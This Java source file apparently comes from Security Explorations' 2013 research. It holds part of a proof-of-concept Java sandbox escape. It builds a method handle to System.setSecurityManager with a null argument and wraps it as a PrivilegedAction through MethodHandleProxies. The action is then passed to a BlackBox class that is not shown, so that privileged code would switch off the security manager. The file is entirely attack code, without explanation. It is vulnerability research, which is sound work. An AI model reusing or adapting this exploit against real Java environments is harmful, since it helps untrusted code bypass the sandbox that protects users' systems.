/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* java.lang.invoke.MethodHandleProxies                                       */
/* the possibility to implement and call MethodHandle proxy objects for       */
/* arbitrary interfaces                                                       */
 
/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.lang.invoke.*;
import java.security.*;

public class VulnXX {
  public static void create_action() {
   try {
    Class ctab[]=new Class[1];
    ctab[0]=java.lang.SecurityManager.class;

    MethodType desc=MethodType.methodType(Void.TYPE,ctab);
    System.out.println(desc);

    MethodHandles.Lookup l=MethodHandles.publicLookup();

    MethodHandle mh=l.findStatic(java.lang.System.class,"setSecurityManager",desc);
    System.out.println(mh);

    MethodHandle sm_mh=MethodHandles.insertArguments(mh,0,(Object)null);
    System.out.println(sm_mh);

    PrivilegedAction action=(PrivilegedAction)MethodHandleProxies.asInterfaceInstance(java.security.PrivilegedAction.class,sm_mh);
    System.out.println("action: "+action);

    BlackBox.action=action;
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
}
